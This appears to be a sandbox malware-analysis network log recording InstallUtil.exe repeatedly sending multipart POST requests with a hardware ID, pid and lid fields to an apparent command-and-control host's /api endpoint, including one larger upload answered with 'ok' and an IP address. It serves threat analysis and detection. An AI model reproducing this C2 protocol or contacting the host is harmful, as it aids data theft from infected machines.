                                                                                                                                                                    2024-01-07 04:29:52 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:53 UTC1333INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:53 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=640tte5uhpker3315gcm14dmi1; expires=Wed, 01-May-2024 22:16:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:53 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:53 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:53 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d6ohi4sTFV7VFgKfawIzcXhzpqW3pIwnlZ9kjBygdR1pZgd4kWBZmnK%2FnDrYYrXJsyyAeyZfgCN6Z8V6tEgAwukDONkuWz4nUYWkrAq%2BZrQetgCIwAIj%2BIgbjBGsJHHuLT1ezrVhVuWlYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 841976559f8b2395-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:53 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.449750172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:53 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:53 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:53 UTC1331INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:53 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=u31etaoee342iqlo70etjof26n; expires=Wed, 01-May-2024 22:16:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:53 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:53 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:53 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Llv9ZmF8CnVi0YyjtE2TSDsh7fPo9DsUtB0Bc7YimydrHGmoKQWpGkzdx6Q4ZzsQNlfUKeptORDRS3O%2FWUfimYZkIm%2Biww1EdicJDSXCE1hkPptqfBp56zTmwoVy7YOhUHVoOuedpWcbsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 841976599a7bc358-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:53 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.449752172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:54 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:54 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:54 UTC1337INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:54 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=m4gsk3jp7urt52ioedpero7jd1; expires=Wed, 01-May-2024 22:16:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:54 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:54 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:54 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a2Rn%2Flisdt%2BuThf42JtQbG3DxMN3vYyChwrJUdle1Fl8HDCjIhXMr2awTS4JclHi5cxqcQiYUKZWVFcfcLAhHi2aNAbZOK%2FjsKM%2B4ruRm0zoyy%2FoIZpt5EQgejozVZcHWdTcLQxW76DSJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8419765dae144249-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:54 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.449753172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:54 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:54 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:55 UTC1343INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=cdjdiv2litej8m016vmtn2lhhg; expires=Wed, 01-May-2024 22:16:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:54 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:54 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:54 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4NadyjoWDcz21%2BQmp9sPavY5YE3x53%2B355UXzwBGG0RtfbtAK7jKWt%2BVZYqVP4uyufW05w8vI%2BmRNs%2BT25NBPgC%2BtHK%2FE65mRpedIpcd4m0fOTbBSktB65wHSiQlMC1MSnzuCRw7%2FfZ70Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 84197661a8e6c427-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:55 UTC26INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:55 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.449756172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:55 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 9609
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:55 UTC9609OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:55 UTC1337INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=asfvv445t48unmve7qjr1lhkuh; expires=Wed, 01-May-2024 22:16:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:55 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:55 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:55 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6wwMc24y7a%2FPVdbHvd%2FHrKn%2BqJwlqntJiO7KGE890pPqub%2FoN0ImNhFG9mRv4VIwo4F7fuNaekksjEk6jCyWyBKdzOLvcrF6HgcevpEViir5U4jzXEyU0msRegpCA3WoLKoB0b4VtB%2BSdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 84197664fc4932d3-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:55 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 31 37 36 0d 0a
                                                                                                                                                                    Data Ascii: 11ok 191.96.227.176
                                                                                                                                                                    2024-01-07 04:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.449758172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:55 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:55 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:56 UTC1331INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:56 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=j4ck9pimv5b14mhuuau6n8u5ot; expires=Wed, 01-May-2024 22:16:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:56 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:56 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:56 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R6yWwShlfjQObKtXxR1QaMqiPcdN32TgBPpF2rQ12ig9eDE7sUAAuXncpSB5v7ISpkqYy%2Bqf8B22d94u1LCYJyHh9WjzEWsItPt6BLo4Mp3HZ2FY2V%2F2mN9LCLbKR8YQXYpZLUPMfd9cDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 841976699f181a0f-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:56 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.449759172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:56 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
